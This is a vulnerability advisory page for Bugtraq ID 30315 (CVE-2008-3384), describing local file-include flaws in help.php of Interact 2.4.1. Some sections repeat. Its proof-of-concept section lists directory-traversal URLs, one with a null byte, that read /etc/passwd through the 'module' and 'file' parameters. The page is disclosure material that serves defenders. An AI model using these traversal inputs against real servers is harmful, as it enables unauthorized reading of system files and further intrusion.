Interact 'help.php' Multiple Local File Include Vulnerabilities
BID:30315
Info
Interact 'help.php' Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 30315 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3384 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 21 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Digital Security Research Group [DSecRG] |
| Vulnerable: |
Interact Learning Community Environment Interact 2.4.1 |
| Not Vulnerable: | |
Discussion
Interact 'help.php' Multiple Local File Include Vulnerabilities
Interact is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues can allow remote attackers to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Interact is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues can allow remote attackers to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Exploit / POC
Interact 'help.php' Multiple Local File Include Vulnerabilities
Attackers can exploit these issues with a browser.
The following example URIs are available:
http://www.example.com/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/help/help.php?file=../../../../../../../../../../../../../etc/passwd
Attackers can exploit these issues with a browser.
The following example URIs are available:
http://www.example.com/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/help/help.php?file=../../../../../../../../../../../../../etc/passwd
Solution / Fix
Interact 'help.php' Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Interact 'help.php' Multiple Local File Include Vulnerabilities
References:
References:
- Interact Project Page (Interact)
- [DSECRG-08-031] Local File Include Vulnerability in Interact 2.4.1] ("Digital Security Research Group \[DSecRG\]"